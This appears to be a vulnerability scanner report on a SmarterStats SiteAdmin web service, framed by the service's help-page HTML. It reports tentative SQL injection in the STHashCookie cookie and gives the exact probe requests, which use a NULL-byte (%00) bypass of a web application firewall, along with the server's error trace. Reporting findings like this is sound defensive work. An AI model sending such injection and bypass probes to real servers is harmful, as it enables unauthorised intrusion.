       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>AddSite</h2>
<p class="intro">Adds a site to the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/AddSite' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soUserName:</td>
<td><input class="frmInput" type="text" size="50" name="soUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soPassword:</td>
<td><input class="frmInput" type="text" size="50" name="soPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soFirstName:</td>
<td><input class="frmInput" type="text" size="50" name="soFirstName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">soLastName:</td>
<td><input class="frmInput" type="text" size="50" name="soLastName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ServerID:</td>
<td><input class="frmInput" type="text" size="50" name="ServerID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">DomainName:</td>
<td><input class="frmInput" type="text" size="50" name="DomainName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="LogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogFormat:</td>
<td><input class="frmInput" type="text" size="50" name="LogFormat"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogWildcard:</td>
<td><input class="frmInput" type="text" size="50" name="LogWildcard"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">LogDaysBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="LogDaysBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogDirectory:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogDirectory"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SmarterLogMonthsBeforeDelete:</td>
<td><input class="frmInput" type="text" size="50" name="SmarterLogMonthsBeforeDelete"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPath:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPath"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">ExportPathURL:</td>
<td><input class="frmInput" type="text" size="50" name="ExportPathURL"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">TimeZoneID:</td>
<td><input class="frmInput" type="text" size="50" name="TimeZoneID"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/AddSite"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneID&gt;<font class=value>int</font>&lt;/TimeZoneID&gt;
&lt;/AddSite&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;AddSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteResult&gt;
&lt;/AddSiteResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;soUserName&gt;<font class=value>string</font>&lt;/soUserName&gt;
&lt;soPassword&gt;<font class=value>string</font>&lt;/soPassword&gt;
&lt;soFirstName&gt;<font class=value>string</font>&lt;/soFirstName&gt;
&lt;soLastName&gt;<font class=value>string</font>&lt;/soLastName&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneID&gt;<font class=value>int</font>&lt;/TimeZoneID&gt;
&lt;/AddSite&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteResult&gt;
&lt;/AddSiteResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/AddSite?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogDirectory</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneID</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/AddSite HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogDirectory</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneID</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.9. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [STHashCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The STHashCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STHashCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Services/SiteAdmin.asmx?op=GetSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}%00'; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:36:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6785
Connection: Close

<html>
<head>
<title>Collection was modified; enumeration operation may not execute.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Collection was modified; enumeration operation may not execute.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.InvalidOperationException: Collection was modified; enumeration operation may not execute.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[InvalidOperationException: Collection was modified; enumeration operation may not execute.]
System.Collections.HashtableEnumerator.MoveNext() +12630115
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +536
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[InvalidOperationException]: Collection was modified; enumeration operation may not execute.
at System.Collections.Hashtable.HashtableEnumerator.MoveNext()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}%00''; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:36:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 19036
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetSite</h2>
<p class="intro">Returns one site listed in the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetSite' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetSite"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSite&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
